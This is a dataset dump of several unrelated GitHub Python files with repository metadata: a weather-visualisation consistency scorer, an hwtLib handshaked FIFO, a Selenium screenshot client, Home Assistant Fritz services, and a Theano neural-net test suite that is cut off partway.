text stringlengths 4 1.02M | meta dict |
|---|---|
import math
class ConsistencyProcessor:
    """Scores how consistent each candidate position is across contour levels.

    For every (level, candidate) pair, builds histograms of active candidates
    on the neighbouring lower/upper levels that fall within a level-dependent
    radius, then combines them into a score weighted by
    ``exp(-gamma * level_distance)``.
    """

    def __init__(self, candPos, levelNumber):
        """
        :param candPos: list of dicts with 'x' and 'y' keys, one per candidate.
        :param levelNumber: number of contour levels.
        """
        self.name = 'Consistency processor'
        self.candPos = candPos
        self.candNumber = len(self.candPos)
        self.levelNumber = levelNumber

    def updateLevelData(self, level, candStatus, gamma):
        """Return the flattened per-(level, candidate) consistency scores.

        :param level: unused; kept for interface compatibility with callers.
        :param candStatus: 2D 0/1 activity table indexed as
            ``candStatus[levelIdx][k]`` with ``k`` in
            ``range(levelNumber * candNumber)``.
        :param gamma: decay rate of the level-distance penalty.
        :return: list of length ``levelNumber * candNumber``; entry
            ``i * candNumber + j`` is the score of candidate ``j`` at level
            ``i`` (0 when no neighbouring evidence was found).
        """
        fL = [0 for _ in range(self.levelNumber * self.candNumber)]
        for i in range(self.levelNumber):
            # search radius doubles with each level: 2**(i+1) / 2 == 2**i
            radius = pow(2, i + 1) / 2
            for j in range(self.candNumber):
                p = [0 for _ in range(self.levelNumber + 1)]
                q = [0 for _ in range(self.levelNumber + 1)]
                xp = self.candPos[j]['x']
                yp = self.candPos[j]['y']
                # construct lower level distribution
                if i == 0:
                    p[0] = 1
                else:
                    for k in range(self.candNumber * self.levelNumber):
                        if candStatus[i - 1][k] == 1:
                            # BUG FIX: floor division required; "/" yields a
                            # float in Python 3 and floats are invalid list
                            # indices (p[levelIndex] below would raise).
                            levelIndex = k // self.candNumber
                            candIndex = k % self.candNumber
                            distance = math.sqrt(pow(self.candPos[candIndex]['x'] - xp, 2) + pow(self.candPos[candIndex]['y'] - yp, 2))
                            if distance <= radius:
                                p[levelIndex] += 1
                # construct upper level distribution
                if i == self.levelNumber - 1:
                    q[0] = 1
                else:
                    for k in range(self.candNumber * self.levelNumber):
                        if candStatus[i + 1][k] == 1:
                            # BUG FIX: same floor-division fix as above
                            levelIndex = k // self.candNumber
                            candIndex = k % self.candNumber
                            distance = math.sqrt(pow(self.candPos[candIndex]['x'] - xp, 2) + pow(self.candPos[candIndex]['y'] - yp, 2))
                            if distance <= radius:
                                q[levelIndex] += 1
                # update fL: weighted average of the exp penalty over all
                # (p, q) level pairs with qIndex >= pIndex
                tempFL = 0
                sumCount = 0
                for pIndex in range(len(p)):
                    for qIndex in range(len(q)):
                        if qIndex >= pIndex:
                            tempFL += p[pIndex] * q[qIndex] * math.exp(-1 * gamma * abs(i - (pIndex + qIndex) / 2.0))
                            sumCount += p[pIndex] * q[qIndex]
                if sumCount != 0:
                    fL[i * self.candNumber + j] = tempFL / sumCount
        return fL
"content_hash": "41c2c2a7a1b9743cfe935b23bdc6a8ad",
"timestamp": "",
"source": "github",
"line_count": 53,
"max_line_length": 135,
"avg_line_length": 47.528301886792455,
"alnum_prop": 0.43985708614529573,
"repo_name": "Edgar324/GeoVis",
"id": "a470e9d90db1190379d621c7c8fa32e9fa4c6721",
"size": "2519",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "weathervis/consistencyprocessor.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "575838"
},
{
"name": "HTML",
"bytes": "26744"
},
{
"name": "JavaScript",
"bytes": "205687"
},
{
"name": "Python",
"bytes": "61645"
},
{
"name": "TypeScript",
"bytes": "76665"
}
],
"symlink_target": ""
} |
from typing import Optional, Tuple, Union
from hwt.interfaces.std import Signal, Rst, Rst_n, Clk
from hwtLib.handshaked.fifo import HandshakedFifo
from hwtLib.mem.fifoDrop import FifoDrop
class HandshakedFifoDrop(HandshakedFifo):
    """
    Fifo for handshaked interface which allows to discard/commit written data

    :see: :class:`hwtLib.handshaked.fifo.HandshakedFifo`
        and :class:`hwtLib.mem.fifoDrop.FifoDrop`

    .. hwt-autodoc:: _example_HandshakedFifoDrop
    """
    # use the droppable FIFO memory implementation instead of the plain one
    FIFO_CLS = FifoDrop

    def _declr(self):
        # Declare the parent FIFO interfaces first, then add the extra
        # control signals for the drop/commit feature.
        HandshakedFifo._declr(self)
        # NOTE(review): roles inferred from names — discard drops pending
        # writes, commit makes them visible; confirm against FifoDrop docs.
        self.dataIn_discard = Signal()
        self.dataIn_commit = Signal()

    def _impl(self, clk_rst: Optional[Tuple[
            Tuple[Clk, Union[Rst, Rst_n]],
            Tuple[Clk, Union[Rst, Rst_n]]]]=None):
        # Build the parent FIFO structure, then wire the extra control
        # signals to the internal FifoDrop instance.
        super(HandshakedFifoDrop, self)._impl(clk_rst=clk_rst)
        f = self.fifo
        f.dataIn.commit(self.dataIn_commit)
        f.dataIn.discard(self.dataIn_discard)
def _example_HandshakedFifoDrop():
    """Build the small example instance used by autodoc and __main__."""
    from hwt.interfaces.std import Handshaked

    unit = HandshakedFifoDrop(Handshaked)
    unit.DEPTH = 8
    unit.DATA_WIDTH = 4
    unit.EXPORT_SIZE = True
    unit.EXPORT_SPACE = True
    return unit
if __name__ == "__main__":
    from hwt.synthesizer.utils import to_rtl_str

    # elaborate the example unit and dump its RTL to stdout
    u = _example_HandshakedFifoDrop()
    print(to_rtl_str(u))
"content_hash": "be7c759de88bac8b7220eacd16771de1",
"timestamp": "",
"source": "github",
"line_count": 46,
"max_line_length": 78,
"avg_line_length": 28.782608695652176,
"alnum_prop": 0.6669184290030211,
"repo_name": "Nic30/hwtLib",
"id": "81c8e3c7e1d4920c2b8296e759589d985cea4b4c",
"size": "1324",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "hwtLib/handshaked/fifoDrop.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C++",
"bytes": "41560"
},
{
"name": "Python",
"bytes": "2523349"
},
{
"name": "VHDL",
"bytes": "117346"
},
{
"name": "Verilog",
"bytes": "36444"
}
],
"symlink_target": ""
} |
"""Main project script."""
import logging
import os
import sys
import time
from selenium.common.exceptions import TimeoutException
# necessary to import from parent directory in non-PyCharm environment
sys.path.append('..')
import penguin
penguin.STATIC_RESOURCE_PATH = '../static'
# Module-level logger writing INFO+ records to main.log.
logger = logging.getLogger(__name__)
logger.setLevel(logging.INFO)
formatter = logging.Formatter('%(asctime)s:%(levelname)s:%(message)s')
file_handler = logging.FileHandler('main.log')
file_handler.setFormatter(formatter)
logger.addHandler(file_handler)
# necessary for chromedriver to find the emulated display
# BUG FIX: the variable name was misspelled "DIPSLAY", so the X display
# was never actually exported and chromedriver could not find it.
os.environ["DISPLAY"] = ":8"
number_of_chrome_drivers = 5   # parallel chrome driver threads
number_of_websites = 10        # websites loaded from the csv
if __name__ == "__main__":
    logger.info('')
    logger.info('Starting "simple_example" penguin client --->')
    logger.info('==========================================================')
    P = penguin.Penguin(chrome_count=number_of_chrome_drivers)
    logger.debug('Created new Penguin with {} chrome drivers'.format(number_of_chrome_drivers))
    # load websites from csv, by default uses latest available file
    P.add_websites(0, number_of_websites)
    logger.debug('Loaded {} websites'.format(number_of_websites))

    # Decorator, used to define what the driver thread does, must take in the website list and driver object, must
    # return whether to keep running and if the url timed out
    @P.driver
    def driver_functionality(websites, chrome, timeouts):
        try:
            url, name = websites.pop(0)
        except IndexError:
            # No more websites to load, False stops thread iteration
            logger.info('Chrome driving thread returned empty website list.. closing thread.')
            return False
        try:
            chrome.get(url)
        except TimeoutException:
            # Took too long to fetch website, save url and name in timeout
            timeouts.append((url, name))
            logger.warning('Timeout occurred for site (\'{}\',\'{}\'), appending to timeout list.'.format(url, name))
            return True
        chrome.save_screenshot('.temp/image/' + name + '.png')
        logger.debug('Chrome driving thread saved a screenshot for \'{}\'.'.format(name))
        return True

    # defines what the image processing thread does,
    # must return whether to keep going and length of files found in .temp
    @P.image_handler
    def image_handler_functionality():
        try:
            queue = os.listdir('.temp/image')
        except OSError:
            # .temp/image directory is gone, False stops thread iteration
            logger.info('Image handler thread returned empty image directory.. closing thread.')
            return False, 0
        for current_file in queue:
            input_path = '.temp/image/' + current_file
            # BUG FIX: str.rstrip('.png') strips any trailing '.', 'p', 'n'
            # or 'g' characters (e.g. 'grouping.png' -> 'groupi'); slice off
            # the literal extension instead.
            if current_file.endswith('.png'):
                input_name = current_file[:-len('.png')]
            else:
                input_name = current_file
            output_path = 'data/' + input_name + '.dph'
            penguin.imagefile_to_dphfile(input_path, input_name, output_path)
            logger.debug('Image handler thread processed \'{}\' into \'{}\'.'.format(input_path, output_path))
            os.remove(input_path)
        time.sleep(.13)
        return True, len(queue)

    logger.info('Beginning client execution.')
    elapsed_time = P.run()
    logger.debug('Image handler thread finished with ' +
                 'a maximum processing queue length of {}.'.format(P.max_queue_length))
    logger.info('Finished client execution in {:.2f} seconds'.format(elapsed_time))
    P.save_timeouts('timeouts.csv')
| {
"content_hash": "d4033b500240ac3933e8be669afc49da",
"timestamp": "",
"source": "github",
"line_count": 96,
"max_line_length": 117,
"avg_line_length": 36.802083333333336,
"alnum_prop": 0.6453439003679592,
"repo_name": "tylerjohnhaden/penguin-website-colors",
"id": "2550b51199eb5b418c438c325f6d367c635f8ea5",
"size": "3552",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "project/main.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "31446"
},
{
"name": "Shell",
"bytes": "109"
}
],
"symlink_target": ""
} |
"""Services for Fritz integration."""
from __future__ import annotations
import logging
import voluptuous as vol
from homeassistant.config_entries import ConfigEntryState
from homeassistant.core import HomeAssistant, ServiceCall
from homeassistant.exceptions import HomeAssistantError
from homeassistant.helpers.service import async_extract_config_entry_ids
from .common import AvmWrapper
from .const import (
DOMAIN,
FRITZ_SERVICES,
SERVICE_CLEANUP,
SERVICE_REBOOT,
SERVICE_RECONNECT,
SERVICE_SET_GUEST_WIFI_PW,
)
_LOGGER = logging.getLogger(__name__)

# Schema for the set_guest_wifi_password service: a required target device
# plus an optional explicit password (8-63 chars) or an optional length
# (8-63) — presumably the length of a generated password; confirm in
# AvmWrapper.service_fritzbox.
SERVICE_SCHEMA_SET_GUEST_WIFI_PW = vol.Schema(
    {
        vol.Required("device_id"): str,
        vol.Optional("password"): vol.Length(min=8, max=63),
        vol.Optional("length"): vol.Range(min=8, max=63),
    }
)

# (service name, voluptuous schema or None) pairs registered by
# async_setup_services; None means no extra fields are validated.
SERVICE_LIST: list[tuple[str, vol.Schema | None]] = [
    (SERVICE_CLEANUP, None),
    (SERVICE_REBOOT, None),
    (SERVICE_RECONNECT, None),
    (SERVICE_SET_GUEST_WIFI_PW, SERVICE_SCHEMA_SET_GUEST_WIFI_PW),
]
async def async_setup_services(hass: HomeAssistant) -> None:
    """Set up services for Fritz integration."""
    # Services are global for the integration: if any one is already
    # registered, a previous config entry performed the setup — bail out.
    for service, _ in SERVICE_LIST:
        if hass.services.has_service(DOMAIN, service):
            return

    async def async_call_fritz_service(service_call: ServiceCall) -> None:
        """Call correct Fritz service."""
        # Resolve the targeted, loaded Fritz config entries; without at
        # least one target the call cannot be dispatched.
        if not (
            fritzbox_entry_ids := await _async_get_configured_avm_device(
                hass, service_call
            )
        ):
            raise HomeAssistantError(
                f"Failed to call service '{service_call.service}'. Config entry for target not found"
            )
        # Dispatch the service to the wrapper of every targeted entry.
        for entry_id in fritzbox_entry_ids:
            _LOGGER.debug("Executing service %s", service_call.service)
            avm_wrapper: AvmWrapper = hass.data[DOMAIN][entry_id]
            if config_entry := hass.config_entries.async_get_entry(entry_id):
                await avm_wrapper.service_fritzbox(service_call, config_entry)
            else:
                _LOGGER.error(
                    "Executing service %s failed, no config entry found",
                    service_call.service,
                )

    # One shared handler serves all Fritz services; the per-service schema
    # (possibly None) validates the call data.
    for service, schema in SERVICE_LIST:
        hass.services.async_register(DOMAIN, service, async_call_fritz_service, schema)
async def _async_get_configured_avm_device(
    hass: HomeAssistant, service_call: ServiceCall
) -> list:
    """Return ids of targeted config entries that are loaded Fritz entries."""
    configured: list = []
    targeted_ids = await async_extract_config_entry_ids(hass, service_call)
    for entry_id in targeted_ids:
        entry = hass.config_entries.async_get_entry(entry_id)
        if entry is None or entry.domain != DOMAIN:
            continue
        if entry.state == ConfigEntryState.LOADED:
            configured.append(entry_id)
    return configured
async def async_unload_services(hass: HomeAssistant) -> None:
    """Unload services for Fritz integration."""
    # Nothing to do unless the services flag is set.
    if not hass.data.get(FRITZ_SERVICES):
        return
    hass.data[FRITZ_SERVICES] = False
    for service_name, _schema in SERVICE_LIST:
        hass.services.async_remove(DOMAIN, service_name)
| {
"content_hash": "c20d69b5391961f0699cd084bc39a26b",
"timestamp": "",
"source": "github",
"line_count": 101,
"max_line_length": 101,
"avg_line_length": 31.455445544554454,
"alnum_prop": 0.6436890147938307,
"repo_name": "rohitranjan1991/home-assistant",
"id": "c4e7de8df5e8d47fdc737b669301c6b1566f6907",
"size": "3177",
"binary": false,
"copies": "6",
"ref": "refs/heads/dev",
"path": "homeassistant/components/fritz/services.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "HTML",
"bytes": "1017265"
},
{
"name": "Python",
"bytes": "1051086"
},
{
"name": "Shell",
"bytes": "3946"
}
],
"symlink_target": ""
} |
from __future__ import print_function
import unittest
import numpy
from nose.plugins.skip import SkipTest
from six.moves import xrange
import theano
from theano import config
from theano import tensor as T
from theano import tensor
from theano import gof
from theano.tests import unittest_tools as utt
from theano import printing
from theano.tensor.nnet import (categorical_crossentropy,
crossentropy_categorical_1hot,
crossentropy_softmax_1hot,
crossentropy_softmax_1hot_with_bias,
crossentropy_softmax_1hot_with_bias_dx,
crossentropy_softmax_argmax_1hot_with_bias,
CrossentropySoftmax1HotWithBiasDx,
CrossentropySoftmaxArgmax1HotWithBias,
CrossentropyCategorical1Hot,
CrossentropyCategorical1HotGrad,
sigmoid, softplus, Softmax, softmax,
softmax_op, softmax_graph, SoftmaxWithBias,
softmax_with_bias, LogSoftmax, logsoftmax_op,
softmax_grad, SoftmaxGrad,
Prepend_scalar_constant_to_each_row,
Prepend_scalar_to_each_row,
relu,
h_softmax,
elu)
from theano.tensor import matrix, vector, lvector, scalar
class T_sigmoid(unittest.TestCase):
    """Gradient check for the elementwise sigmoid op."""

    def setUp(self):
        utt.seed_rng()

    def test_elemwise(self):
        # finite-difference gradient check on a small random matrix
        data = numpy.random.rand(3, 4)
        utt.verify_grad(sigmoid, [data])
class T_softplus(unittest.TestCase):
    """Gradient check for the elementwise softplus op."""

    def setUp(self):
        utt.seed_rng()

    def test_elemwise(self):
        # finite-difference gradient check on a small random matrix
        data = numpy.random.rand(3, 4)
        utt.verify_grad(softplus, [data])
class T_Softmax(utt.InferShapeTester):
    """Gradient, shape-inference and forward checks for the Softmax op."""

    def _check_column_grad(self, col):
        # gradient of a single softmax output column w.r.t. the input
        utt.verify_grad(lambda a: softmax_op(a)[:, col],
                        [numpy.random.rand(3, 4)])

    def test0(self):
        self._check_column_grad(0)

    def test1(self):
        self._check_column_grad(1)

    def test2(self):
        self._check_column_grad(2)

    def test3(self):
        self._check_column_grad(3)

    def test_infer_shape(self):
        inp = matrix()
        inp_val = numpy.random.rand(3, 4).astype(config.floatX)
        self._compile_and_check([inp], [Softmax()(inp)],
                                [inp_val], Softmax)

    def test_vector(self):
        # forward pass on a vector input matches a direct numpy computation
        x = T.vector()
        fn = theano.function([x], softmax_op(x))
        xv = numpy.random.randn(6).astype(config.floatX)
        assert numpy.allclose(fn(xv), numpy.exp(xv) / numpy.exp(xv).sum())

    def test_vector_grad(self):
        utt.verify_grad(lambda a: softmax_op(a), [numpy.random.rand(4)])
class T_SoftmaxWithBias(utt.InferShapeTester):
    """Tests for softmax_with_bias: per-column gradients, optimizer
    behaviour on broadcasted inputs, trace preservation and shape
    inference."""

    # test0..test3: gradient of one output column at a time, w.r.t. both
    # the input matrix and the bias vector.
    def test0(self):
        def f(a, b):
            return softmax_with_bias(a, b)[:, 0]
        utt.verify_grad(f, [numpy.random.rand(3, 4),
                            numpy.random.rand(4)])
    def test1(self):
        def f(a, b):
            return softmax_with_bias(a, b)[:, 1]
        utt.verify_grad(f, [numpy.random.rand(3, 4),
                            numpy.random.rand(4)])
    def test2(self):
        def f(a, b):
            return softmax_with_bias(a, b)[:, 2]
        utt.verify_grad(f, [numpy.random.rand(3, 4),
                            numpy.random.rand(4)])
    def test3(self):
        def f(a, b):
            return softmax_with_bias(a, b)[:, 3]
        utt.verify_grad(f, [numpy.random.rand(3, 4),
                            numpy.random.rand(4)])
    def test_broadcast(self):
        # test that we don't raise an error during optimization for no good
        # reason as softmax_with_bias don't support correctly some/all
        # broadcasted inputs pattern
        initial_W = numpy.asarray([[0.1, 0.1, 0.1],
                                   [0.1, 0.1, 0.1],
                                   [0.1, 0.1, 0.1]],
                                  dtype=theano.config.floatX)
        W = theano.shared(value=initial_W, name='W')
        vbias = theano.shared(value=0.1, name='vbias')  # 0.01
        hid = T.vector('hid')
        f = theano.function([hid],
                            T.nnet.softmax_op(T.dot(hid, W.T) + vbias))
        ops = [node.op for node in f.maker.fgraph.toposort()]
        # the optimizer must keep the plain softmax here instead of
        # substituting softmax_with_bias
        assert softmax_with_bias not in ops
        assert softmax_op in ops
        f([0, 1, 0])
        # print f.maker.fgraph.toposort()
    def test_softmax_with_bias_trace(self):
        # the compiled output must keep its creation traceback tag
        a = theano.shared(
            numpy.random.randn(3).astype(config.floatX))
        b = theano.shared(numpy.float32(numpy.random.randn()))
        sm = T.nnet.softmax(a + b)
        f = theano.function([], sm)
        self.assertTrue(hasattr(f.maker.fgraph.outputs[0].tag, 'trace'))
        print('f.maker.fgraph.outputs[0]: {0}'.format(f.maker.fgraph.outputs[0], ))
    def test_infer_shape(self):
        admat = matrix()
        advec = vector()
        admat_val = numpy.random.rand(3, 4).astype(config.floatX)
        advec_val = numpy.random.rand(4).astype(config.floatX)
        self._compile_and_check([admat, advec],
                                [SoftmaxWithBias()(admat, advec)],
                                [admat_val, advec_val], SoftmaxWithBias)
class T_LogSoftmax(utt.InferShapeTester):
    """Tests for the LogSoftmax op: per-column gradients, forward
    correctness, numerical stability versus naive log(softmax(x)), and the
    graph optimizations substituting LogSoftmax for Log(Softmax)."""

    # test0..test3: gradient of one log-softmax output column at a time.
    def test0(self):
        def f(a):
            return logsoftmax_op(a)[:, 0]
        utt.verify_grad(f, [numpy.random.rand(3, 4)])
    def test1(self):
        def f(a):
            return logsoftmax_op(a)[:, 1]
        utt.verify_grad(f, [numpy.random.rand(3, 4)])
    def test2(self):
        def f(a):
            return logsoftmax_op(a)[:, 2]
        utt.verify_grad(f, [numpy.random.rand(3, 4)])
    def test3(self):
        def f(a):
            return logsoftmax_op(a)[:, 3]
        utt.verify_grad(f, [numpy.random.rand(3, 4)])
    def test_matrix(self):
        # gradient of the full output matrix
        def f(a):
            return logsoftmax_op(a)
        utt.verify_grad(f, [numpy.random.rand(3, 4)])
    def test_vector(self):
        # forward pass on a vector matches the naive numpy formula
        x = T.vector()
        f = theano.function([x], logsoftmax_op(x))
        xv = numpy.random.randn(6).astype(config.floatX)
        assert numpy.allclose(f(xv),
                              numpy.log(numpy.exp(xv) / numpy.exp(xv).sum()))
    def test_vector_grad(self):
        def f(a):
            return logsoftmax_op(a)
        utt.verify_grad(f, [numpy.random.rand(4)])
    def test_allclose(self):
        # Compare the numerically stable log-softmax path against the naive
        # log(softmax(x)) formulation: forward values and crossentropy costs
        # must agree, and the stable gradient must stay finite on large
        # inputs.
        m = theano.config.mode
        m = theano.compile.get_mode(m)
        m.check_isfinite = False
        x, y = tensor.matrices('xy')
        # regular softmax and crossentropy
        sm = tensor.nnet.softmax(x)
        cm = tensor.nnet.categorical_crossentropy(sm, y)
        # numerically stable log-softmax with crossentropy
        logsm = tensor.nnet.logsoftmax(x)
        sm2 = tensor.exp(logsm)  # just used to show equivalence with sm
        cm2 = -tensor.sum(y * logsm, axis=1)
        grad = tensor.grad(cm2.mean(), x)
        # create some inputs into a softmax that are large and labels
        a = numpy.exp(10 * numpy.random.rand(5, 10).astype(theano.config.floatX))
        # create some one-hot coded labels
        b = numpy.eye(5, 10).astype(theano.config.floatX)
        # show equivalence of softmax and exponentiated numerically stable
        # log-softmax
        f1 = theano.function([x], [sm, sm2])
        sm_, sm2_ = f1(a)
        utt.assert_allclose(sm_, sm2_)
        # now show that the two versions result in the same crossentropy cost
        # this indicates that the forward function does provide some numerical
        # stability
        f2 = theano.function([x, y], [cm, cm2], mode=m)
        cm_, cm2_ = f2(a, b)
        utt.assert_allclose(cm_, cm2_)
        # now, show that in the standard softmax case the gradients blow up
        # while in the log-softmax case they don't
        f3 = theano.function([x, y], [grad])
        grad_ = f3(a, b)
        assert numpy.all(numpy.isnan(grad_) == False)
    def test_isclose(self):
        # NOTE(review): dead test — it only defines a local function and
        # never calls or asserts anything; kept to preserve the test
        # suite's public interface.
        def f(a):
            return logsoftmax_op(a)
    def test_local_softmax_optimization(self):
        """Test the Logsoftmax substitution
        Check that Log(Softmax(x)) is substituted with Logsoftmax(x). Note that
        only the forward pass is checked (i.e., doesn't check the gradient)
        """
        x, y = tensor.matrices('xy')
        sm = tensor.nnet.softmax(x)
        logsm = tensor.log(sm)
        f = theano.function([x], logsm)
        self.assertTrue(hasattr(f.maker.fgraph.outputs[0].tag, 'trace'))
        assert isinstance(f.maker.fgraph.outputs[0].owner.op,
                          theano.tensor.nnet.nnet.LogSoftmax)
    def test_local_softmax_grad_optimization_and_big_input(self):
        """Test the Logsoftmax's grad substitution.
        Check that Log(Softmax(x))'s grad is substituted with Logsoftmax(x)'s
        grad and that the new operation does not explode for big inputs.
        Note that only the grad is checked.
        """
        m = theano.config.mode
        m = theano.compile.get_mode(m)
        m.check_isfinite = False
        # some inputs that are large to make the gradient explode in the non
        # optimized case
        a = numpy.exp(10 * numpy.random.rand(5, 10).astype(theano.config.floatX))
        def myfunc(x):
            sm = tensor.nnet.softmax(x)
            logsm = tensor.log(sm)
            return logsm
        # We set step to 0.1 because for big values we need a big epsilon
        utt.verify_grad(myfunc, [a], eps=0.1, mode=m)
        f = theano.function([], myfunc(a))
        self.assertTrue(hasattr(f.maker.fgraph.outputs[0].tag, 'trace'))
class T_SoftmaxGrad(utt.InferShapeTester):
    """Shape inference check for the SoftmaxGrad op."""

    def test_infer_shape(self):
        in1 = matrix()
        in2 = matrix()
        val1 = numpy.random.rand(3, 4).astype(config.floatX)
        val2 = numpy.random.rand(3, 4).astype(config.floatX)
        self._compile_and_check([in1, in2],
                                [SoftmaxGrad()(in1, in2)],
                                [val1, val2], SoftmaxGrad)
class T_CrossentropySoftmax1Hot(unittest.TestCase):
    """Gradient checks for crossentropy_softmax_1hot(_with_bias)."""

    def setUp(self):
        utt.seed_rng()

    def test0(self):
        targets = [0, 1, 3]

        def nll(a, b):
            return crossentropy_softmax_1hot_with_bias(a, b, targets)[0]

        utt.verify_grad(nll, [numpy.random.rand(3, 4),
                              numpy.random.rand(4)])

    def test1(self):
        targets = [0, 1, 3]

        def nll(a):
            return crossentropy_softmax_1hot(a, targets)[0]

        utt.verify_grad(nll, [numpy.random.rand(3, 4)])

    def test_vector(self):
        # vector input is promoted to a 1-row matrix via shape_padleft
        targets = [3]

        def nll(a):
            return crossentropy_softmax_1hot(T.shape_padleft(a), targets)[0]

        utt.verify_grad(nll, [numpy.random.rand(4)])

    def test_vectors(self):
        targets = [3]

        def nll(a, b):
            return crossentropy_softmax_1hot(T.shape_padleft(a) + b, targets)[0]

        utt.verify_grad(nll, [numpy.random.rand(4), numpy.random.rand(4)])
class T_CrossentropySoftmax1HotWithBiasDx(utt.InferShapeTester):
    """Tests for CrossentropySoftmax1HotWithBiasDx: gradients w.r.t. both
    inputs, shape inference, and rejection of negative class indices."""

    def test0(self):
        # gradient w.r.t. the softmax output, for each supported class dtype
        def ff(class_dtype):
            def f(sm):
                # Class indices
                y = numpy.random.randint(low=0, high=5, size=10).astype(class_dtype)
                return theano.tensor.nnet.crossentropy_softmax_1hot_with_bias_dx(
                    numpy.random.rand(10),  # Gradient w.r.t. NLL.
                    sm,  # Softmax output.
                    y)
            return f
        # Build a random softmax output whose rows sum to 1.
        softmax_output = numpy.random.rand(10, 5)
        softmax_output /= softmax_output.sum(axis=1).reshape(10, 1)
        for dtype in ['uint8', 'int8', 'uint64', 'int64']:
            utt.verify_grad(ff(dtype), [softmax_output])
    def test1(self):
        # gradient w.r.t. the incoming NLL gradient (first argument)
        rng = numpy.random.RandomState(utt.fetch_seed())
        softmax_output = rng.rand(10, 5)
        softmax_output /= softmax_output.sum(axis=1).reshape(10, 1)
        def f(dy):
            return (theano.tensor.nnet.crossentropy_softmax_1hot_with_bias_dx(
                dy,
                softmax_output,
                rng.randint(low=0, high=5, size=10)))
        utt.verify_grad(f, [rng.rand(10)])
    def test_infer_shape(self):
        admat = matrix()
        advec = vector()
        alvec = lvector()
        rng = numpy.random.RandomState(utt.fetch_seed())
        admat_val = rng.rand(10, 5).astype(config.floatX)
        admat_val /= admat_val.sum(axis=1).reshape(10, 1)
        advec_val = rng.rand(10).astype(config.floatX)
        alvec_val = rng.randint(low=0, high=5, size=10)
        self._compile_and_check([advec, admat, alvec],
                                [CrossentropySoftmax1HotWithBiasDx()(advec, admat, alvec)],
                                [advec_val, admat_val, alvec_val],
                                CrossentropySoftmax1HotWithBiasDx)
    def test_neg_idx(self):
        # a negative class index must raise ValueError at run time
        admat = matrix()
        advec = vector()
        alvec = lvector()
        rng = numpy.random.RandomState(utt.fetch_seed())
        admat_val = rng.rand(10, 5).astype(config.floatX)
        admat_val /= admat_val.sum(axis=1).reshape(10, 1)
        advec_val = rng.rand(10).astype(config.floatX)
        alvec_val = rng.randint(low=0, high=5, size=10)
        alvec_val[1] = -1
        out = CrossentropySoftmax1HotWithBiasDx()(advec, admat, alvec)
        f = theano.function([advec, admat, alvec], out)
        self.assertRaises(ValueError, f, advec_val, admat_val, alvec_val)
class T_CrossentropySoftmaxArgmax1HotWithBias(utt.InferShapeTester):
    """Tests for the fused CrossentropySoftmaxArgmax1HotWithBias op:
    gradients through its NLL and softmax outputs, shape inference, and
    rejection of negative class indices."""

    def setUp(self):
        super(T_CrossentropySoftmaxArgmax1HotWithBias, self).setUp()
        self.op = theano.tensor.nnet.crossentropy_softmax_argmax_1hot_with_bias
    def test0(self):
        n_classes = 5
        n_samples = 3
        # First test gradient when getting a gradient on the NLL output.
        def grad_on_nll_dtype(dtype):
            def grad_on_nll(x, b):
                y_idx = numpy.random.randint(low=0, high=n_classes, size=n_samples).astype(dtype)
                return self.op(x, b, y_idx=y_idx)[0]
            return grad_on_nll
        # repeat for every supported integer dtype of the class indices
        for dtype in ['uint8', 'int8', 'uint64', 'int64']:
            utt.verify_grad(grad_on_nll_dtype(dtype),
                            [numpy.random.rand(n_samples, n_classes),
                             numpy.random.rand(n_classes)])
        # Then test gradient when getting a gradient on the softmax output.
        def grad_on_softmax(x, b):
            return self.op(x, b, y_idx=numpy.random.randint(
                low=0, high=n_classes, size=n_samples))[1]
        utt.verify_grad(grad_on_softmax,
                        [numpy.random.rand(n_samples, n_classes),
                         numpy.random.rand(n_classes)])
    def test_infer_shape(self):
        admat = matrix()
        advec = vector()
        alvec = lvector()
        rng = numpy.random.RandomState(utt.fetch_seed())
        admat_val = rng.rand(3, 5).astype(config.floatX)
        advec_val = rng.rand(5).astype(config.floatX)
        alvec_val = rng.randint(low=0, high=5, size=3)
        self._compile_and_check([admat, advec, alvec],
                                CrossentropySoftmaxArgmax1HotWithBias()(admat, advec, alvec),
                                [admat_val, advec_val, alvec_val],
                                CrossentropySoftmaxArgmax1HotWithBias)
    def test_neg_idx(self):
        # a negative class index must raise ValueError at run time
        admat = matrix()
        advec = vector()
        alvec = lvector()
        rng = numpy.random.RandomState(utt.fetch_seed())
        admat_val = rng.rand(3, 5).astype(config.floatX)
        advec_val = rng.rand(5).astype(config.floatX)
        alvec_val = rng.randint(low=0, high=5, size=3)
        alvec_val[1] = -1
        out = CrossentropySoftmaxArgmax1HotWithBias()(admat, advec, alvec)
        f = theano.function([admat, advec, alvec], out)
        self.assertRaises(ValueError, f, admat_val, advec_val, alvec_val)
class T_prepend(utt.InferShapeTester):
    """Tests for the Prepend_scalar_* row ops."""

    def test0(self):
        """Prepend a constant scalar column to each row."""
        inp = tensor.matrix('x')
        out = Prepend_scalar_constant_to_each_row(4.)(inp)
        fn = theano.function([inp], out)
        mat = numpy.random.rand(3, 5).astype(config.floatX)
        res = fn(mat)
        self.assertTrue(res.shape == (3, 6), res.shape)
        self.assertTrue(numpy.all(res[:, 0] == 4.0))

    def test1(self):
        """Prepend a runtime scalar column to each row."""
        inp = tensor.matrix('x')
        out = Prepend_scalar_to_each_row()(5., inp)
        fn = theano.function([inp], out)
        mat = numpy.ones((3, 5), dtype="float32")
        res = fn(mat)
        self.assertTrue(res.shape == (3, 6))
        self.assertTrue(numpy.all(res[:, 0] == 5.0))

    def test_infer_shape(self):
        admat = matrix()
        adscal = scalar()
        rng = numpy.random.RandomState(utt.fetch_seed())
        admat_val = rng.rand(3, 5).astype(config.floatX)
        adscal_val = numpy.asarray(rng.rand(), dtype=config.floatX).item()
        self._compile_and_check(
            [admat],
            [Prepend_scalar_constant_to_each_row(adscal_val)(admat)],
            [admat_val],
            Prepend_scalar_constant_to_each_row)
        self._compile_and_check(
            [adscal, admat],
            [Prepend_scalar_to_each_row()(adscal, admat)],
            [adscal_val, admat_val],
            Prepend_scalar_to_each_row)
class T_CrossentropyCategorical1HotGrad(utt.InferShapeTester):
    """Shape inference check for CrossentropyCategorical1HotGrad."""

    def test_infer_shape(self):
        invec = vector()
        inmat = matrix()
        inidx = lvector()
